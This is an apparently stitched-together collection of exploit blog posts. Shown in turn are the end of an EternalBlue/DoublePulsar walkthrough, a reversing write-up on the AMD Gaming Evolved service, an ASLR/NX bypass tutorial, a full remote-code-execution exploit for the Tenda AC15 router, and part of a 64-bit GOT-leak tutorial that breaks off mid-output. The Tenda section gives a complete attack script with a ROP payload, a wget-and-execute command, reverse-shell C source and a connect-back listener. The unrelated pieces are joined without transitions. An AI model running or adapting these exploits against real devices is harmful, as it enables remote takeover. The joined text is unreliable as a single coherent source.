If everything looks good, hit enter to launch your exploit. DoublePulsar will connect, check on the EternalBlue backdoor, and inject the DLL. You should see a [+] Doublepulsar Succeeded message. Here’s what the attack looks like from your Windows box:

And now the good part — open up your Kali box. If everything has gone well, you’ve now got a meterpreter session open, and you should have NT Authority\Systemw00t!

In the next post, we’ll do the same thing with PowerShell Empire. Sick of the Red Team stuff? Coming up are event viewer logs for each of the steps described, PCAPs of each attack, and an analysis of what hits the disk when you launch EternalBlue and DoublePulsar.

AMD Gaming Evolved exploiting

Background

For anyone running an AMD GPU from a few years back, you’ve probably come across a piece of software installed on your computer from Raptr, Inc. If you don’t remember installing it, it’s because for several years it was installed silently along-side your AMD drivers. The software was marketed to the gaming community and labeled AMD Gaming Evolved. While I haven’t ever actually used the software, I’ve gathered that it allowed you to tweak your GPU as well as record your gameplay using another application called playstv.

I personally discovered the software while performing a routine check of what software running on my PC was listening for inbound connections. I try to make it a point to at least give a minimal amount of attention to any software I find accepting connections from outside of my PC. However, when I originally discovered this, my free time was scarce so I just made a note of it and uninstalled the software. The following screenshot shows the plays_service.exe binary listening on all interfaces on what appears to be an ephemeral port.

Fast forward two years, I update my AMD drivers and notice plays_service.exe” has shown up on my computer again. This time I decide to give it a little more attention.

Reversing – Windows Service

Opening up plays_service.exe in IDA, we see the usual boiler plate service code and trace it down to the main entry point. From here we almost immediately recognize that this application is python based and has been packaged with something like py2exe. While decompiling python byte code is rather trivial, the trick with these types of executables is identifying and locating the python classes. Python byte-code in a py2exe packaged binary is typically embedded in the executable or loaded from some relative path on disk. At this point, I usually open up the strings subview in IDA to see if anything obvious jumps out.

I see at least a few interesting string references that are worth investigating. Several of them look like they may have something to do with the initialization of python. The first string I track down is “Unable to create Python obj for executable name!” . At first glance it appears to be an error message if certain python objects aren’t created properly. Scrolling up in the function it references, I see the following code.

This function appears to be the python setup routine. Returning to my list of strings, I see several references to zip.

%s%cpython%d%d.zip
zipimport
cannot import zipimport module
zipimporter

I decided to search through the install directory and see if there were any zip files present. Success, only one zip file exists and it is named python35.zip! It’s filename also matches the format string of one of the string references above. I unzip the file and peruse its contents. The zip file contains thousands of compiled bytecode python files which I presume to be the applications core source code and library dependencies.

Reversing – Compiled Python

Looking through the compiled python files, I see three that may be the service’s source code.

I decompiled each of the files using uncompyle6 and opened them up in a text editor. The largest of the three, plays_service.pyc, turned out to be the main service source. The service is a basic HTTP server made up of a few simple classes. It binds to an ephermal port on startup and writes the port to the registry to be used by the greater application. The POST request handler code is listed below.

The handler expects a JSON formatted POST request with a couple of parameters. The first is the data parameter which holds the command to be processed. The second is a hash value of the data provided and a secret key. Lucky for us, the secret key just so happens to be hard-coded in the class definition. If the computed hash matches the one provided, the handler calls one of two defined command function, “extract_files” or “execute_installer”. From here I began to look at the “execute_installer” function because the name sounded quite promising.

The function logic is pretty straight forward. It performs a couple insignificant checks, resolves two paths passed as parameters to the POST request, and then calls CreateProcess. The most important detail of note is that while it looks like a fully controlled command injection is possible, the calls to win32api.GetShortPathName throw an exception if the parameter passed does not resolve to a file. This limits the exploitation of this vulnerability significantly but still allows for privilege escalation to SYSTEM and remote compromise using anonymous outbound SMB.

Exploit

Exploiting this “feature” for file execution didn’t take a significant amount of work. The only real requirements were properly setting up the POST request and hashing the right portion of data. A proof of concept for achieving file execution with this vulnerability (CVE-2018-6546) can be found here.

Bypass ASLR+NX Part 1

Hi guys today i will explain how to bypass ASLR and NX mitigation technique if you dont have any knowledge about ASLR and NX you can read it in Above link i will explain it but not in depth

ASLR:Address Space Layout randomization : it’s mitigation to technique to prevent exploitation of memory by make Address randomize not fixed as we saw in basic buffer overflow exploit it need to but start of buffer in EIP and Redirect execution to execute your shellcode but when it’s random it will make it hard to guess that start of buffer random it’s only in shared library address we found ASLR in stack address ,Heap Address.

NX: Non-Executable it;s another mitigation use to prevent memory from execute any machine code(shellcode) as we saw in basic buffer overflow  you  put shellcode in stack and redirect EIP to begin of buffer to execute it but this will not work here this mitigation could be bypass by Ret2libc exploit technique use function inside binary pass it to stack and aslo they are another way   depend on gadgets inside binary or shared library this technique is ROP Return Oriented Programming i will  make separate article .

After we get little info about ASLR and NX now it’s time to see how we can bypass it, to bypass ASLR there are many ways like Ret2PLT use Procedural Linkage Table contains a stub code for each global function. A call instruction in text segment doesnt call the function (‘function’) directly instead it calls the stub code(func@PLT) why we use Return in PLT because it’not randomized  it’s address know before execution itself  another technique is overwrite GOT and  brute-forcing this technique use when the address partial randomized like 2 or 3 bytes just randomized .

in this article i will explain technique combine Ret2plt and some ROP gadgets and Ret2libc see let divided it
first find Ret2PLT

vulnerable code

we compile it with following Flags

now let check ASLR it’s enable it

 

as you see in above image libc it’s randomized but it could be brute-force it

now let open file in gdb

now it’s clear NX was enable it now let fuzzing binary .

we create pattern and we going to pass to  binary  to detect where overflow occur

 

 

now we can see they are pattern in EIP we use another tool to find where overflow occurred.

1028 to overwrite EBP if we add 4bytes we going control EIP and we can redirect our execution.

 

now we have control EIP .

ok after we do basic overflow steps now we need way let us to bypass ASLR+NX .

first find functions PLT in binary file.

we find strcpy and system PLT now how we going to build our exploit depend on two methods just.
second we must find writable section in binary file to fill it and use system like to we did in traditional Ret2libc.

first think in .bss section is use by compilers and linkers for the  part  of the data segment containing static allocated variables that are not initialized .

after that we will use strcpy to write string in .bss address but what address ?
ok let back to function we find it in PLT strcpy as we know we will be use to write string and system to execute command but will can;t find /bin/sh in binary file we have another way is to look at binary.

now we have string address  it’s time to combine all pieces we found it.

1-use strcpy to copy from SRC to DEST SRC in this case it’s our string «sh» and DEST   it’s our writable area «.bss» but we need to chain two method strcpy and system we look for gadgets depend on our parameters in this case just we need pop pop ret.

we chose 0x080484ba does’t matter  register name  we need just two pop .
2-after we write string  we use system like we use it in Ret2libc but in this case «/bin/sh» will be .bss address.

final payload

strcpy+ppr+.bss+s
strcpy+ppr+.bss+1+h
system+dump+.bss

Final Exploit

 

we got Shell somtime you need to chain many technique to get final exploit to bypass more than one mitigation.

REMOTE CODE EXECUTION ROP,NX,ASLR (CVE-2018-5767) Tenda’s AC15 router

INTRODUCTION (CVE-2018-5767)

In this post we will be presenting a pre-authenticated remote code execution vulnerability present in Tenda’s AC15 router. We start by analysing the vulnerability, before moving on to our regular pattern of exploit development – identifying problems and then fixing those in turn to develop a working exploit.

N.B – Numerous attempts were made to contact the vendor with no success. Due to the nature of the vulnerability, offset’s have been redacted from the post to prevent point and click exploitation.

LAYING THE GROUNDWORK

The vulnerability in question is caused by a buffer overflow due to unsanitised user input being passed directly to a call to sscanf. The figure below shows the vulnerable code in the R7WebsSecurityHandler function of the HTTPD binary for the device.

Note that the “password=” parameter is part of the Cookie header. We see that the code uses strstr to find this field, and then copies everything after the equals size (excluding a ‘;’ character – important for later) into a fixed size stack buffer.

If we send a large enough password value we can crash the server, in the following picture we have attached to the process using a cross compiled Gdbserver binary, we can access the device using telnet (a story for another post).

This crash isn’t exactly ideal. We can see that it’s due to an invalid read attempting to load a byte from R3 which points to 0x41414141. From our analysis this was identified as occurring in a shared library and instead of looking for ways to exploit it, we turned our focus back on the vulnerable function to try and determine what was happening after the overflow.

In the next figure we see the issue; if the string copied into the buffer contains “.gif”, then the function returns immediately without further processing. The code isn’t looking for “.gif” in the password, but in the user controlled buffer for the whole request. Avoiding further processing of a overflown buffer and returning immediately is exactly what we want (loc_2f7ac simply jumps to the function epilogue).

Appending “.gif” to the end of a long password string of “A”‘s gives us a segfault with PC=0x41414141. With the ability to reliably control the flow of execution we can now outline the problems we must address, and therefore begin to solve them – and so at the same time, develop a working exploit.

To begin with, the following information is available about the binary:

file httpd
format elf
type EXEC (Executable file)
arch arm
bintype elf
bits 32
canary false
endian little
intrp /lib/ld-uClibc.so.0
machine ARM
nx true
pic false
relocs false
relro no
static false

I’ve only included the most important details – mainly, the binary is a 32bit ARMEL executable, dynamically linked with NX being the only exploit mitigation enabled (note that the system has randomize_va_space = 1, which we’ll have to deal with). Therefore, we have the following problems to address:

  1. Gain reliable control of PC through offset of controllable buffer.
  2. Bypass No Execute (NX, the stack is not executable).
  3. Bypass Address space layout randomisation (randomize_va_space = 1).
  4. Chain it all together into a full exploit.

PROBLEM SOLVING 101

The first problem to solve is a general one when it comes to exploiting memory corruption vulnerabilities such as this –  identifying the offset within the buffer at which we can control certain registers. We solve this problem using Metasploit’s pattern create and pattern offset scripts. We identify the correct offset and show reliable control of the PC register:

With problem 1 solved, our next task involves bypassing No Execute. No Execute (NX or DEP) simply prevents us from executing shellcode on the stack. It ensures that there are no writeable and executable pages of memory. NX has been around for a while so we won’t go into great detail about how it works or its bypasses, all we need is some ROP magic.

We make use of the “Return to Zero Protection” (ret2zp) method [1]. The problem with building a ROP chain for the ARM architecture is down to the fact that function arguments are passed through the R0-R3 registers, as opposed to the stack for Intel x86. To bypass NX on an x86 processor we would simply carry out a ret2libc attack, whereby we store the address of libc’s system function at the correct offset, and then a null terminated string at offset+4 for the command we wish to run:

To perform a similar attack on our current target, we need to pass the address of our command through R0, and then need some way of jumping to the system function. The sort of gadget we need for this is a mov instruction whereby the stack pointer is moved into R0. This gives us the following layout:

We identify such a gadget in the libc shared library, however, the gadget performs the following instructions.

mov sp, r0
blx r3

This means that before jumping to this gadget, we must have the address of system in R3. To solve this problem, we simply locate a gadget that allows us to mov or pop values from the stack into R3, and we identify such a gadget again in the libc library:

pop {r3,r4,r7,pc}

This gadget has the added benefit of jumping to SP+12, our buffer should therefore look as such:

Note the ‘;.gif’ string at the end of the buffer, recall that the call to sscanf stops at a ‘;’ character, whilst the ‘.gif’ string will allow us to cleanly exit the function. With the following Python code, we have essentially bypassed NX with two gadgets:

libc_base = ****
curr_libc = libc_base + (0x7c &lt;&lt; 12)
system = struct.pack(«&lt;I», curr_libc + ****)
#: pop {r3, r4, r7, pc}
pop = struct.pack(«&lt;I», curr_libc + ****)
#: mov r0, sp ; blx r3
mv_r0_sp = struct.pack(«&lt;I», curr_libc + ****)
password = «A»*offset
password += pop + system + «B»*8 + mv_r0_sp + command + «.gif»

With problem 2 solved, we now move onto our third problem; bypassing ASLR. Address space layout randomisation can be very difficult to bypass when we are attacking network based applications, this is generally due to the fact that we need some form of information leak. Although it is not enabled on the binary itself, the shared library addresses all load at different addresses on each execution. One method to generate an information leak would be to use “native” gadgets present in the HTTPD binary (which does not have ASLR) and ROP into the leak. The problem here however is that each gadget contains a null byte, and so we can only use 1. If we look at how random the randomisation really is, we see that actually the library addresses (specifically libc which contains our gadgets) only differ by one byte on each execution. For example, on one run libc’s base may be located at 0xXXXXXXXX, and on the next run it is at 0xXXXXXXXX

. We could theoretically guess this value, and we would have a small chance of guessing correct.

This is where our faithful watchdog process comes in. One process running on this device is responsible for restarting services that have crashed, so every time the HTTPD process segfaults, it is immediately restarted, pretty handy for us. This is enough for us to do some naïve brute forcing, using the following process:

With NX and ASLR successfully bypassed, we now need to put this all together (problem 3). This however, provides us with another set of problems to solve:

  1. How do we detect the exploit has been successful?
  2. How do we use this exploit to run arbitrary code on the device?

We start by solving problem 2, which in turn will help us solve problem 1. There are a few steps involved with running arbitrary code on the device. Firstly, we can make use of tools on the device to download arbitrary scripts or binaries, for example, the following command string will download a file from a remote server over HTTP, change its permissions to executable and then run it:

command = «wget http://192.168.0.104/malware -O /tmp/malware &amp;&amp; chmod 777 /tmp/malware &amp;&amp; /tmp/malware &amp;;»

The “malware” binary should give some indication that the device has been exploited remotely, to achieve this, we write a simple TCP connect back program. This program will create a connection back to our attacking system, and duplicate the stdin and stdout file descriptors – it’s just a simple reverse shell.

#include <sys/socket.h>

#include <sys/types.h>

#include <string.h>

#include <stdio.h>

#include <netinet/in.h>

int main(int argc, char **argv)

{

struct sockaddr_in addr;

socklen_t addrlen;

int sock = socket(AF_INET, SOCK_STREAM, 0);

memset(&addr, 0x00, sizeof(addr));

addr.sin_family = AF_INET;

addr.sin_port = htons(31337);

addr.sin_addr.s_addr = inet_addr(“192.168.0.104”);

int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));

dup2(sock, 0);

dup2(sock, 1);

dup2(sock, 2);

system(“/bin/sh”);

}

We need to cross compile this code into an ARM binary, to do this, we use a prebuilt toolchain downloaded from Uclibc. We also want to automate the entire process of this exploit, as such, we use the following code to handle compiling the malicious code (with a dynamically configurable IP address). We then use a subprocess to compile the code (with the user defined port and IP), and serve it over HTTP using Python’s SimpleHTTPServer module.

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

#write the code with ip and port to a.c

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

#wait for the process to terminate so we can get its return code

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

This code will allow us to utilise the wget tool present on the device to fetch our binary and run it, this in turn will allow us to solve problem 1. We can identify if the exploit has been successful by waiting for connections back. The abstract diagram in the next figure shows how we can make use of a few threads with a global flag to solve problem 1 given the solution to problem 2.

The functions shown in the following code take care of these processes:

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777

/tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base address each time

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d”%i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the process.

time.sleep(1)

 

print “[+] Exploit done”

Finally, we put all of this together by spawning the individual threads, as well as getting command line options as usual:

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”,

help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”,

help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”,

help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your  ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified,

you need a uclibc arm cross compiler,

such as https://www.uclibc.org/downloads/

binaries/0.9.30/cross-compiler-arm4l.tar.bz2″)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

With all of this together, we run the code and after a few minutes get our reverse shell as root:

The full code is here:

#!/usr/bin/env python

import urllib2

import struct

import time

import socket

from optparse import *

import SimpleHTTPServer

import SocketServer

import threading

import sys

import os

import subprocess

 

ARM_REV_SHELL = (

“#include <sys/socket.h>\n”

“#include <sys/types.h>\n”

“#include <string.h>\n”

“#include <stdio.h>\n”

“#include <netinet/in.h>\n”

“int main(int argc, char **argv)\n”

“{\n”

”           struct sockaddr_in addr;\n”

”           socklen_t addrlen;\n”

”           int sock = socket(AF_INET, SOCK_STREAM, 0);\n”

 

”           memset(&addr, 0x00, sizeof(addr));\n”

 

”           addr.sin_family = AF_INET;\n”

”           addr.sin_port = htons(%d);\n”

”           addr.sin_addr.s_addr = inet_addr(\”%s\”);\n”

 

”           int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n”

 

”           dup2(sock, 0);\n”

”           dup2(sock, 1);\n”

”           dup2(sock, 2);\n”

 

”           system(\”/bin/sh\”);\n”

“}\n”

)

 

REV_PORT = 31337

HTTPD_PORT = 8888

DONE = False

 

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

 

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base continuosly

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d” %i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the

time.sleep(1)

 

print “[+] Exploit done”

 

 

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”, help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”, help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”, help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2”)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

64-bit Linux stack smashing tutorial: Part 3

t’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT, and using it to determine the addresses of other functions in libc that we can return to.

Setup

The setup is identical to what I was using in part 1 and part 2. No new tools required.

Leaking a libc address

Here’s the source code for the binary we’ll be exploiting:

/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
    asm("pop %rdi; pop %rsi; pop %rdx; ret");
}

int vuln() {
    char buf[150];
    ssize_t b;
    memset(buf, 0, 150);
    printf("Enter input: ");
    b = read(0, buf, 400);

    printf("Recv: ");
    write(1, buf, b);
    return 0;
}

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    vuln();
    return 0;
}

You can compile it yourself, or download the precompiled binary here.

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150 byte buffer. With ASLR on, we can’t just return to system() as its address will be different each time the program runs. The high level solution to exploiting this is as follows:

  1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
  2. Get libc’s base address so we can calculate the address of other library functions. libc’s base address is the difference between memset()’s address, and memset()’s offset from libc.so.6.
  3. A library function’s address can be obtained by adding its offset from libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
  4. Overwrite a GOT entry’s address with system()’s address, so that when we call that function, it calls system() instead.

You should have a bit of an understanding on how shared libraries work in Linux. In a nutshell, the loader will initially point the GOT entry for a library function to some code that will do a slow lookup of the function address. Once it finds it, it overwrites its GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means the second time a library function is called, the GOT entry will point to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

Grab memset()’s entry in the GOT:

# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

# echo "br *0x4006c6" >> ~/.gdbinit

Now let’s attach gdb to socat.

# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
.
.
.
gdb-peda$ c
Continuing.

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

# nc localhost 2323

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
   0x4006cb <vuln+36>:  mov    edi,0x4007e4

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda$ x/5i 0x0000000000400576
   0x400576 <memset@plt+6>:     push   0x3
   0x40057b <memset@plt+11>:    jmp    0x400530
   0x400580 <read@plt>: jmp    QWORD PTR [rip+0x200ab2]        # 0x601038 <read@got.plt>
   0x400586 <read@plt+6>:       push   0x4
   0x40058b <read@plt+11>:      jmp    0x400530

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda$ x/5i 0x00007f86f37335c0
   0x7f86f37335c0 <memset>:     movd   xmm8,esi
   0x7f86f37335c5 <memset+5>:   mov    rax,rdi
   0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
   0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
   0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0

If we can write memset()’s GOT entry back to us, we’ll receive it’s address of 0x00007f86f37335c0. We can do that by overwriting vuln()’s saved return pointer to setup a ret2plt; in this case, write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

# keep socket open so gdb doesn't get a SIGTERM
while True: 
    s.recv(1024)

Let’s see it in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f679978e5c0

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “p memset”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.

Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

# ldd leak
        linux-vdso.so.1 =>  (0x00007ffd5affe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
        /lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
